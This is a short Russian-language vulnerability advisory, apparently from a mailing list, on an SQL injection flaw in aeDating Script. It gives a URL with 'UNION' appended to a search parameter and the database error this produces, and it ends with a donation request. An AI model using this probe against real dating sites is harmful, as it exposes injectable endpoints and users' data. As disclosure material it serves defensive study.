Описание:
Найдена уязвимость в он-лайн программном обеспечении сайтов для
знакомств - aeDating Script, которая может быть использована для поиска
soulmate в этом сервисе.
Использование:
www.[target].com/search.php просто выбираем одну страну и нажимаем на
кнопку 'Search', после этих действий вы можете увидеть что-то такое:
www.target.com/search_result.php?Sex=male&LookingFor=female&DateOfBirth_start=18&DateOfBirth_end=40&Country%5B%5D=0
И для того, что бы создать ошибку скрипта, вам нужно добавить что-нибудь
в конец ссылки, например UNION:
www.target.com/search_result.php?Sex=male&LookingFor=female&DateOfBirth_start=18&DateOfBirth_end=40&Country%5B%5D=0UNION
И в результате получаем:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL
result resource in /home/site/public_html/search_result.php on line 370
ERROR Database access error
Если Вам нравится эта рассылка и Вы пользуетесь сведениями из неё, то
можете
поддержать автора, перечислив небольшое вознаграждение на R474348938531 или
Z451490294903. Связаться со мной можно по ICQ 273214003.